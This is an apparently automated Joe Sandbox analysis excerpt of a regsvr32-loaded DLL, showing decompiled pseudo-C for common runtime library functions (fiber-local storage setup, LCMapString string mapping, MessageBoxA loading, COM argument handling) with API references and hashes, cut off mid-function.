0x1001457c
0x100145bf
0x100145bf
0x100145c4
0x100145c4
0x1001457e
0x10014580
0x10014586
0x1001458c
0x1001458e
0x10014592
0x00000000
0x10014594
0x1001459b
0x100145a1
0x100145a3
0x00000000
0x100145a5
0x100145a5
0x100145ac
0x100145af
0x100145b5
0x100145b9
0x100145bb
0x100145bb
0x100145a3
0x10014592
0x100145c8
0x100144e3
0x100144e3
0x100144ea
0x100144ea

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,100117B3,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 100144F2
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001450A
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10014517
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10014524
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10014531
FlsAlloc.KERNEL32(Function_00014364,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 1001456E
FlsSetValue.KERNEL32(00000000,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 1001459B
GetCurrentThreadId.KERNEL32 ref: 100145AF

Part of subcall function 100142C3: FlsFree.KERNEL32(FFFFFFFF,10011842,?,?,10011907,?,?,?,1002E838,0000000C), ref: 100142CE
Part of subcall function 100142C3: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,10011842,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014BEF
Part of subcall function 100142C3: DeleteCriticalSection.KERNEL32(FFFFFFFF,?,?,10011842,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014C19

Strings

FlsFree, xrefs: 10014526
kernel32.dll, xrefs: 100144ED
FlsSetValue, xrefs: 10014519
FlsGetValue, xrefs: 1001450C
FlsAlloc, xrefs: 10014504

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$kernel32.dll
API String ID: 2635119114-282957996
Opcode ID: 2e103f57caa91a0cfb90aac41c3c104b5786fb34048b9bb1a032e375845c9179
Instruction ID: af069f205ff7abee73080b4f93dad51a1e22592e06cb8c6d60a03263aa4c0447
Opcode Fuzzy Hash: 2e103f57caa91a0cfb90aac41c3c104b5786fb34048b9bb1a032e375845c9179
Instruction Fuzzy Hash: 7D215B70941A619FE362DF359C8891A7EE5FB827A0B52062AF845CF272DB31D8C1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10018266 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 299
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E10018266(void* __ebx, void* __edi, int __esi, void* __eflags) {
				signed int _t119;
				intOrPtr _t120;
				int _t122;
				char* _t125;
				int _t132;
				signed int _t134;
				int _t137;
				int _t138;
				int _t157;
				short* _t160;
				short* _t163;
				int _t164;
				signed int _t165;
				long _t169;
				signed int _t172;
				int _t181;
				char* _t183;
				int _t184;
				signed int _t186;
				int _t187;
				int _t190;
				void* _t192;
				short* _t193;
				char* _t195;
				char* _t196;
				signed int _t199;

				_t185 = __esi;
				_push(0x38);
				_push(0x1002f1e8);
				E10012CE0(__ebx, __edi, __esi);
				_t199 =  *0x1003a4d8; // 0x1
				if(_t199 == 0) {
					_t185 = 1;
					if(LCMapStringW(0, 0x100, 0x1002e9cc, 1, 0, 0) == 0) {
						_t169 = GetLastError();
						__eflags = _t169 - 0x78;
						if(_t169 == 0x78) {
							 *0x1003a4d8 = 2;
						}
					} else {
						 *0x1003a4d8 = 1;
					}
				}
				if( *(_t192 + 0x14) <= 0) {
					L11:
					_t119 =  *0x1003a4d8; // 0x1
					if(_t119 == 2 || _t119 == 0) {
						 *(_t192 - 0x28) = 0;
						_t183 = 0;
						 *(_t192 - 0x3c) = 0;
						__eflags =  *(_t192 + 8);
						if( *(_t192 + 8) == 0) {
							_t138 =  *0x1003a4c0; // 0x0
							 *(_t192 + 8) = _t138;
						}
						__eflags =  *(_t192 + 0x20);
						if( *(_t192 + 0x20) == 0) {
							_t137 =  *0x1003a4d0; // 0x0
							 *(_t192 + 0x20) = _t137;
						}
						_t120 = E10019AB4( *(_t192 + 8));
						 *((intOrPtr*)(_t192 - 0x40)) = _t120;
						__eflags = _t120 - 0xffffffff;
						if(_t120 != 0xffffffff) {
							__eflags = _t120 -  *(_t192 + 0x20);
							if(__eflags == 0) {
								_t186 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 + 0x18),  *(_t192 + 0x1c));
								L61:
								__eflags =  *(_t192 - 0x28);
								if( *(_t192 - 0x28) != 0) {
									_push( *(_t192 - 0x28));
									E1001111B();
								}
								_t122 = _t186;
								goto L64;
							}
							_push(0);
							_push(0);
							_t175 = _t192 + 0x14;
							_push(_t192 + 0x14);
							_push( *(_t192 + 0x10));
							_push(_t120);
							_push( *(_t192 + 0x20));
							_t125 = E10019AF7(0, _t183, _t185, __eflags);
							_t195 =  &(_t193[0xc]);
							 *(_t192 - 0x28) = _t125;
							__eflags = _t125;
							if(_t125 == 0) {
								goto L46;
							}
							_t187 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc), _t125,  *(_t192 + 0x14), 0, 0);
							 *(_t192 - 0x24) = _t187;
							__eflags = _t187;
							if(_t187 == 0) {
								_t186 =  *(_t192 - 0x48);
								L58:
								__eflags =  *(_t192 - 0x3c);
								if( *(_t192 - 0x3c) != 0) {
									_push(_t183);
									E1001111B();
								}
								goto L61;
							}
							 *(_t192 - 4) = 0;
							E100116D0(_t126 + 0x00000003 & 0xfffffffc, _t175);
							 *(_t192 - 0x18) = _t195;
							_t183 = _t195;
							 *(_t192 - 0x44) = _t183;
							E10012400(_t183, 0, _t187);
							_t196 =  &(_t195[0xc]);
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							__eflags = _t183;
							if(_t183 != 0) {
								L54:
								_t132 = LCMapStringA( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x28),  *(_t192 + 0x14), _t183,  *(_t192 - 0x24));
								 *(_t192 - 0x24) = _t132;
								__eflags = _t132;
								if(__eflags != 0) {
									_push( *(_t192 + 0x1c));
									_push( *(_t192 + 0x18));
									_push(_t192 - 0x24);
									_push(_t183);
									_push( *(_t192 + 0x20));
									_push( *((intOrPtr*)(_t192 - 0x40)));
									_t134 = E10019AF7(0, _t183, _t187, __eflags);
									asm("sbb esi, esi");
									_t186 =  ~( ~_t134);
									goto L58;
								}
								goto L55;
							} else {
								_t183 = E10011233( *(_t192 - 0x24));
								__eflags = _t183;
								if(_t183 == 0) {
									L55:
									_t186 = 0;
									goto L58;
								}
								E10012400(_t183, 0,  *(_t192 - 0x24));
								_t196 =  &(_t196[0xc]);
								 *(_t192 - 0x3c) = 1;
								goto L54;
							}
						} else {
							goto L46;
						}
					} else {
						if(_t119 != 1) {
							L46:
							_t122 = 0;
							L64:
							return E10012D1B(_t122);
						}
						_t184 = 0;
						 *(_t192 - 0x2c) = 0;
						 *(_t192 - 0x38) = 0;
						 *(_t192 - 0x34) = 0;
						if( *(_t192 + 0x20) == 0) {
							_t164 =  *0x1003a4d0; // 0x0
							 *(_t192 + 0x20) = _t164;
						}
						_t190 = MultiByteToWideChar( *(_t192 + 0x20), 1 + (0 |  *((intOrPtr*)(_t192 + 0x24)) != 0x00000000) * 8,  *(_t192 + 0x10),  *(_t192 + 0x14), 0, 0);
						 *(_t192 - 0x30) = _t190;
						if(_t190 == 0) {
							goto L46;
						} else {
							 *(_t192 - 4) = 1;
							E100116D0(_t190 + _t190 + 0x00000003 & 0xfffffffc, _t172);
							 *(_t192 - 0x18) = _t193;
							 *(_t192 - 0x1c) = _t193;
							 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
							if( *(_t192 - 0x1c) != 0) {
								L21:
								if(MultiByteToWideChar( *(_t192 + 0x20), 1,  *(_t192 + 0x10),  *(_t192 + 0x14),  *(_t192 - 0x1c), _t190) == 0) {
									L36:
									if( *(_t192 - 0x34) != 0) {
										_push( *(_t192 - 0x20));
										E1001111B();
									}
									if( *(_t192 - 0x38) != 0) {
										_push( *(_t192 - 0x1c));
										E1001111B();
									}
									_t122 = _t184;
									goto L64;
								}
								_t184 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190, 0, 0);
								 *(_t192 - 0x2c) = _t184;
								if(_t184 == 0) {
									goto L36;
								}
								if(( *(_t192 + 0xd) & 0x00000004) == 0) {
									 *(_t192 - 4) = 2;
									E100116D0(_t184 + _t184 + 0x00000003 & 0xfffffffc, _t172);
									 *(_t192 - 0x18) = _t193;
									 *(_t192 - 0x20) = _t193;
									 *(_t192 - 4) =  *(_t192 - 4) | 0xffffffff;
									__eflags =  *(_t192 - 0x20);
									if( *(_t192 - 0x20) != 0) {
										L31:
										_t157 = LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 - 0x20), _t184);
										__eflags = _t157;
										if(_t157 != 0) {
											_push(0);
											_push(0);
											__eflags =  *(_t192 + 0x1c);
											if( *(_t192 + 0x1c) != 0) {
												_push( *(_t192 + 0x1c));
												_push( *(_t192 + 0x18));
											} else {
												_push(0);
												_push(0);
											}
											_t184 = WideCharToMultiByte( *(_t192 + 0x20), 0,  *(_t192 - 0x20), _t184, ??, ??, ??, ??);
										}
										goto L36;
									} else {
										_t160 = E10011233(_t184 + _t184);
										 *(_t192 - 0x20) = _t160;
										__eflags = _t160;
										if(_t160 == 0) {
											goto L36;
										}
										 *(_t192 - 0x34) = 1;
										goto L31;
									}
								}
								if( *(_t192 + 0x1c) != 0 && _t184 <=  *(_t192 + 0x1c)) {
									LCMapStringW( *(_t192 + 8),  *(_t192 + 0xc),  *(_t192 - 0x1c), _t190,  *(_t192 + 0x18),  *(_t192 + 0x1c));
								}
								goto L36;
							} else {
								_t163 = E10011233(_t190 + _t190);
								_pop(_t172);
								 *(_t192 - 0x1c) = _t163;
								if(_t163 == 0) {
									goto L46;
								}
								 *(_t192 - 0x38) = 1;
								goto L21;
							}
						}
					}
				}
				_t181 =  *(_t192 + 0x14);
				_t165 =  *(_t192 + 0x10);
				while(1) {
					_t172 = _t181 - 1;
					if( *_t165 == 0) {
						break;
					}
					_t165 = _t165 + 1;
					if(_t172 != 0) {
						continue;
					}
					_t172 = _t172 | 0xffffffff;
					break;
				}
				 *(_t192 + 0x14) =  *(_t192 + 0x14) + (_t165 | 0xffffffff) - _t172;
				goto L11;
			}

0x10018266
0x10018266
0x10018268
0x1001826d
0x10018274
0x1001827a
0x10018280
0x10018295
0x1001829f
0x100182a5
0x100182a8
0x100182aa
0x100182aa
0x10018297
0x10018297
0x10018297
0x10018295
0x100182b7
0x100182d4
0x100182d4
0x100182dc
0x100184be
0x100184c1
0x100184c3
0x100184c6
0x100184c9
0x100184cb
0x100184d0
0x100184d0
0x100184d3
0x100184d6
0x100184d8
0x100184dd
0x100184dd
0x100184e3
0x100184e9
0x100184ec
0x100184ef
0x100184f8
0x100184fb
0x10018607
0x10018609
0x10018609
0x1001860c
0x1001860e
0x10018611
0x10018616
0x10018617
0x00000000
0x10018617
0x10018501
0x10018502
0x10018503
0x10018506
0x10018507
0x1001850a
0x1001850b
0x1001850e
0x10018513
0x10018516
0x10018519
0x1001851b
0x00000000
0x00000000
0x1001852f
0x10018531
0x10018534
0x10018536
0x100185de
0x100185e1
0x100185e1
0x100185e4
0x100185e6
0x100185e7
0x100185ec
0x00000000
0x100185e4
0x1001853c
0x10018545
0x1001854a
0x1001854d
0x1001854f
0x10018555
0x1001855a
0x1001856f
0x10018573
0x10018575
0x1001859a
0x100185aa
0x100185b0
0x100185b3
0x100185b5
0x100185bb
0x100185be
0x100185c4
0x100185c5
0x100185c6
0x100185c9
0x100185cc
0x100185d8
0x100185da
0x00000000
0x100185da
0x00000000
0x10018577
0x10018580
0x10018582
0x10018584
0x100185b7
0x100185b7
0x00000000
0x100185b7
0x1001858b
0x10018590
0x10018593
0x00000000
0x10018593
0x00000000
0x00000000
0x00000000
0x100182ea
0x100182ed
0x100184f1
0x100184f1
0x10018619
0x10018621
0x10018621
0x100182f3
0x100182f5
0x100182f8
0x100182fb
0x10018301
0x10018303
0x10018308
0x10018308
0x1001832c
0x1001832e
0x10018333
0x00000000
0x10018339
0x10018339
0x10018349
0x1001834e
0x10018353
0x10018356
0x1001837a
0x10018398
0x100183af
0x1001849b
0x1001849e
0x100184a0
0x100184a3
0x100184a8
0x100184ac
0x100184ae
0x100184b1
0x100184b6
0x100184b7
0x00000000
0x100184b7
0x100183c7
0x100183c9
0x100183ce
0x00000000
0x00000000
0x100183d8
0x10018407
0x10018417
0x1001841c
0x10018421
0x10018424
0x10018445
0x10018448
0x10018462
0x10018470
0x10018476
0x10018478
0x1001847a
0x1001847b
0x1001847c
0x1001847f
0x10018485
0x10018488
0x10018481
0x10018481
0x10018482
0x10018482
0x10018499
0x10018499
0x00000000
0x1001844a
0x1001844e
0x10018454
0x10018457
0x10018459
0x00000000
0x00000000
0x1001845b
0x00000000
0x1001845b
0x10018448
0x100183dd
0x100183fc
0x100183fc
0x00000000
0x1001837c
0x10018380
0x10018385
0x10018386
0x1001838b
0x00000000
0x00000000
0x10018391
0x00000000
0x10018391
0x1001837a
0x10018333
0x100182dc
0x100182b9
0x100182bc
0x100182bf
0x100182bf
0x100182c2
0x00000000
0x00000000
0x100182c4
0x100182c7
0x00000000
0x00000000
0x100182c9
0x00000000
0x100182c9
0x100182d1
0x00000000

APIs

LCMapStringW.KERNEL32(00000000,00000100,1002E9CC,00000001,00000000,00000000,1002F1E8,00000038,10012713,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 1001828D
GetLastError.KERNEL32 ref: 1001829F
MultiByteToWideChar.KERNEL32(?,00000000,100129C0,?,00000000,00000000,1002F1E8,00000038,10012713,00000100,00000020,00000100,?,00000100,00000000,00000001), ref: 10018326
MultiByteToWideChar.KERNEL32(?,00000001,100129C0,?,?,00000000), ref: 100183A7
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 100183C1
LCMapStringW.KERNEL32(00000000,00000000,?,00000000,?,?), ref: 100183FC

Strings

@hvpYv, xrefs: 10018493

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID: @hvpYv
API String ID: 1775797328-2766943729
Opcode ID: 5777c4d7027dff9c9b409d5aeb58933a6c7c88dae46e3481cf6094212a665003
Instruction ID: b77d93e963007cb419293e7f2dd35d286a24c56a776a93d47894a7fb6c141361
Opcode Fuzzy Hash: 5777c4d7027dff9c9b409d5aeb58933a6c7c88dae46e3481cf6094212a665003
Instruction Fuzzy Hash: D4B1287280061AEFDF12CFA4CC858DE7BB5FB08394F214129FA15AA160D735DBA1DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001A6B4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 90
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E1001A6B4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
				char _v8;
				signed char _v12;
				char _v20;
				intOrPtr* _t13;
				intOrPtr* _t14;
				intOrPtr* _t17;
				void* _t19;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t26;
				void* _t28;
				struct HINSTANCE__* _t31;
				void* _t33;

				_t28 = 0;
				_t33 =  *0x1003a618 - _t28; // 0x0
				if(_t33 != 0) {
					L6:
					_t13 =  *0x1003a624; // 0x0
					if(_t13 == 0) {
						L14:
						_t14 =  *0x1003a61c; // 0x0
						if(_t14 != 0) {
							_t28 =  *_t14();
							if(_t28 != 0) {
								_t17 =  *0x1003a620; // 0x0
								if(_t17 != 0) {
									_t28 =  *_t17(_t28);
								}
							}
						}
						L18:
						return  *0x1003a618(_t28, _a4, _a8, _a12);
					}
					_t19 =  *_t13();
					if(_t19 == 0) {
						L10:
						if( *0x1003a180 < 4) {
							_a14 = _a14 | 0x00000004;
						} else {
							_a14 = _a14 | 0x00000020;
						}
						goto L18;
					}
					_push( &_v8);
					_push(0xc);
					_push( &_v20);
					_push(1);
					_push(_t19);
					if( *0x1003a628() == 0 || (_v12 & 0x00000001) == 0) {
						goto L10;
					} else {
						goto L14;
					}
				}
				_t31 = LoadLibraryA("user32.dll");
				if(_t31 == 0) {
					L12:
					return 0;
				}
				_t23 = GetProcAddress(_t31, "MessageBoxA");
				 *0x1003a618 = _t23;
				if(_t23 == 0) {
					goto L12;
				} else {
					 *0x1003a61c = GetProcAddress(_t31, "GetActiveWindow");
					 *0x1003a620 = GetProcAddress(_t31, "GetLastActivePopup");
					if( *0x1003a174 == 2) {
						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
						 *0x1003a628 = _t26;
						if(_t26 != 0) {
							 *0x1003a624 = GetProcAddress(_t31, "GetProcessWindowStation");
						}
					}
					goto L6;
				}
			}

0x1001a6bb
0x1001a6bd
0x1001a6c5
0x1001a734
0x1001a734
0x1001a73b
0x1001a779
0x1001a779
0x1001a780
0x1001a784
0x1001a788
0x1001a78a
0x1001a791
0x1001a796
0x1001a796
0x1001a791
0x1001a788
0x1001a798
0x00000000
0x1001a7a2
0x1001a73d
0x1001a741
0x1001a760
0x1001a767
0x1001a773
0x1001a769
0x1001a769
0x1001a769
0x00000000
0x1001a767
0x1001a746
0x1001a747
0x1001a74c
0x1001a74d
0x1001a74f
0x1001a758
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a758
0x1001a6d2
0x1001a6d6
0x1001a76f
0x00000000
0x1001a76f
0x1001a6e8
0x1001a6ec
0x1001a6f1
0x00000000
0x1001a6f3
0x1001a701
0x1001a70f
0x1001a714
0x1001a71c
0x1001a720
0x1001a725
0x1001a72f
0x1001a72f
0x1001a725
0x00000000
0x1001a714

APIs

LoadLibraryA.KERNEL32(user32.dll,1002EFE8,?,?), ref: 1001A6CC
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 1001A6E8
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 1001A6F9
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 1001A706
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 1001A71C
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 1001A72D

Strings

MessageBoxA, xrefs: 1001A6E2
GetProcessWindowStation, xrefs: 1001A727
user32.dll, xrefs: 1001A6C7
GetUserObjectInformationA, xrefs: 1001A716
GetLastActivePopup, xrefs: 1001A6FB
GetActiveWindow, xrefs: 1001A6F3

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
API String ID: 2238633743-1612076079
Opcode ID: b7c8b26199f9313d3872de1edf43e103a36baaadc2da0241c7ae0f859c6971c5
Instruction ID: ece4e5b35ea2c1b03849cd45da7b458718d01a20518a95c23a8b8522e981f2d9
Opcode Fuzzy Hash: b7c8b26199f9313d3872de1edf43e103a36baaadc2da0241c7ae0f859c6971c5
Instruction Fuzzy Hash: 2E217431A04325AEEB43DFB48CC5B6A3BF8EB07694F550429E900DE192D774DAC19764

Uniqueness

Uniqueness Score: -1.00%

Function 10029F79 Relevance: 19.9, APIs: 13, Instructions: 395
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E10029F79(intOrPtr __ecx) {
				signed int __ebx;
				signed int __edi;
				CHAR* __esi;
				signed int _t161;
				signed int _t164;
				intOrPtr* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t178;
				void* _t192;
				signed short _t203;
				signed int _t204;
				signed int _t205;
				signed int* _t207;
				signed int _t209;
				void* _t213;
				signed int _t214;
				signed int _t217;
				signed short* _t224;
				void* _t233;
				CHAR* _t235;
				signed int _t236;
				intOrPtr* _t237;
				void* _t238;
				void* _t239;
				signed short _t242;
				signed int _t243;
				intOrPtr _t244;
				signed short* _t245;
				signed int** _t246;
				void* _t247;
				void* _t249;
				void* _t250;
				void* _t253;
				void* _t263;

				E10011A8C(E1002AF40, _t247);
				_t250 = _t249 - 0x60;
				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
				_t161 =  *0x10036148(_t233, _t239, _t213);
				_t214 = 0;
				 *(_t247 - 0x20) = _t161;
				if( *((intOrPtr*)(__ecx)) != 0) {
					E10012400(_t247 - 0x4c, 0, 0x10);
					_t235 =  *(_t247 + 0x18);
					_t253 = _t250 + 0xc;
					if(_t235 == 0) {
						_t164 =  *(_t247 - 0x44);
					} else {
						_t164 = lstrlenA(_t235);
						 *(_t247 - 0x44) = _t164;
					}
					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
						 *((intOrPtr*)(_t247 - 0x40)) = 1;
						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
					}
					if(_t164 != _t214) {
						_t244 = E1001F51F(_t164 << 4);
						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
						E10012400(_t244, _t214,  *(_t247 - 0x44) << 4);
						_t253 = _t253 + 0x10;
						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
						 *(_t247 - 0x14) = _t235;
						 *(_t247 - 0x10) = _t245;
						if( *_t235 != 0) {
							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
							_t246 =  &(_t245[4]);
							_t22 = _t200 - 4; // 0xfffffff9
							_t217 = _t22;
							 *(_t247 - 0x18) = _t246;
							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
							_t238 = 4;
							do {
								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
								_t224 =  *(_t247 - 0x10);
								 *_t224 = _t203;
								if((_t203 & 0x00000040) != 0) {
									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
								}
								_t204 =  *_t224 & 0x0000ffff;
								_t263 = _t204 - 0x4002;
								if(_t263 > 0) {
									_t205 = _t204 - 0x4003;
									__eflags = _t205 - 0x12;
									if(_t205 <= 0x12) {
										switch( *((intOrPtr*)(_t205 * 4 +  &M1002A43E))) {
											case 0:
												goto L36;
											case 1:
												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
												_t217 = _t217 + _t238;
												_t207 =  *_t217;
												asm("sbb ecx, ecx");
												 *_t207 =  ~( *_t207) & 0x0000ffff;
												goto L37;
											case 2:
												goto L38;
										}
									}
								} else {
									if(_t263 == 0) {
										L36:
										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
										_t217 = _t217 + _t238;
										__eflags = _t217;
										_t207 =  *_t217;
										L37:
										 *_t246 = _t207;
									} else {
										_t209 = _t204;
										if(_t209 <= 0x13) {
											switch( *((intOrPtr*)(_t209 * 4 +  &M1002A3EE))) {
												case 0:
													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
													_t217 = _t217 + _t238;
													_t210 =  *_t217;
													goto L16;
												case 1:
													goto L36;
												case 2:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 3:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
													__eax =  *(__ebp + 0x1c);
													__ebx = __ebx + 8;
													 *__esi =  *( *(__ebp + 0x1c));
													goto L38;
												case 4:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eflags = __ebx;
													__eax =  *__ebx;
													__ecx =  *__eax;
													goto L22;
												case 5:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													_push(__eax);
													 *(__ebp - 0x18) = __eax;
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L25;
														}
													}
													goto L38;
												case 6:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__ebx =  ~( *__ebx);
													asm("sbb eax, eax");
													L16:
													 *_t246 = _t210;
													goto L38;
												case 7:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
													__edi =  *(__ebp - 0x10);
													__ebx = __ebx + 4;
													__esi =  *__ebx;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__esi =  *(__ebp - 0x18);
													_push(4);
													_pop(__edi);
													goto L38;
												case 8:
													L26:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													__eax =  *__ebx;
													__eflags = __eax;
													 *(__ebp - 0x18) = __eax;
													if(__eax != 0) {
														__eax = lstrlenA( *(__ebp - 0x18));
														__eax = __eax + 1;
														 *(__ebp - 0x24) = __eax;
														__eax = __eax + __eax;
														__eax = __eax + 3;
														__eax = __eax & 0xfffffffc;
														__eflags = __eax;
														__eax = __esp;
														__eax = E10008BC0(__esp,  *(__ebp - 0x18),  *(__ebp - 0x24),  *((intOrPtr*)(__ebp - 0x20)));
													}
													_push(__eax);
													__imp__#2();
													__eflags =  *(__ebp - 0x18);
													 *__esi = __eax;
													if( *(__ebp - 0x18) != 0) {
														__eflags = __eax;
														if(__eax == 0) {
															L25:
															__eax = E1001D1DB(__ecx);
															goto L26;
														}
													}
													__eax =  *(__ebp - 0x10);
													 *( *(__ebp - 0x10)) = 8;
													goto L38;
												case 9:
													goto L38;
												case 0xa:
													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
													__ebx = __ebx + __edi;
													 *__esi =  *__ebx;
													goto L38;
												case 0xb:
													__eax =  *(__ebp + 0x1c);
													__eax =  *(__ebp + 0x1c) + 8;
													__ecx =  *__eax;
													 *(__ebp + 0x1c) = __eax;
													__ebx = __ebx + 8;
													L22:
													 *__esi = __ecx;
													__esi[4] = __eax;
													goto L38;
											}
										}
									}
								}
								L38:
								 *(_t247 - 0x10) =  *(_t247 - 0x10) - 0x10;
								_t246 = _t246 - 0x10;
								 *(_t247 - 0x14) =  &(( *(_t247 - 0x14))[1]);
								 *(_t247 - 0x18) = _t246;
							} while ( *( *(_t247 - 0x14)) != 0);
							_t235 =  *(_t247 + 0x18);
							_t214 = 0;
						}
					}
					_t242 = 0;
					E1001064A(_t247 - 0x3c);
					if( *(_t247 + 0x10) != _t214) {
						_t242 = _t247 - 0x3c;
					}
					E10012400(_t247 - 0x6c, _t214, 0x20);
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t247 - 0x28))));
					 *(_t247 - 0x2c) =  *(_t247 - 0x2c) | 0xffffffff;
					 *(_t247 + 0x18) =  *((intOrPtr*)( *_t170 + 0x18))(_t170,  *((intOrPtr*)(_t247 + 8)), 0x1002fb68, _t214,  *(_t247 + 0xc), _t247 - 0x4c, _t242, _t247 - 0x6c, _t247 - 0x2c);
					_t172 =  *(_t247 - 0x44);
					if(_t172 != _t214) {
						_t214 = (_t172 << 4) +  *((intOrPtr*)(_t247 - 0x4c)) - 0x10;
						_t242 = _t235;
						if( *_t235 != 0) {
							do {
								_t192 =  *_t242;
								if(_t192 == 8 || _t192 == 0xe) {
									__imp__#9(_t214);
								}
								_t214 = _t214 - 0x10;
								_t242 = _t242 + 1;
								_t273 =  *_t242;
							} while ( *_t242 != 0);
						}
					}
					_push( *((intOrPtr*)(_t247 - 0x4c)));
					_t161 = L1001F54A(_t214, _t235, _t242, _t273);
					_pop(_t221);
					if( *(_t247 + 0x18) >= 0) {
						L63:
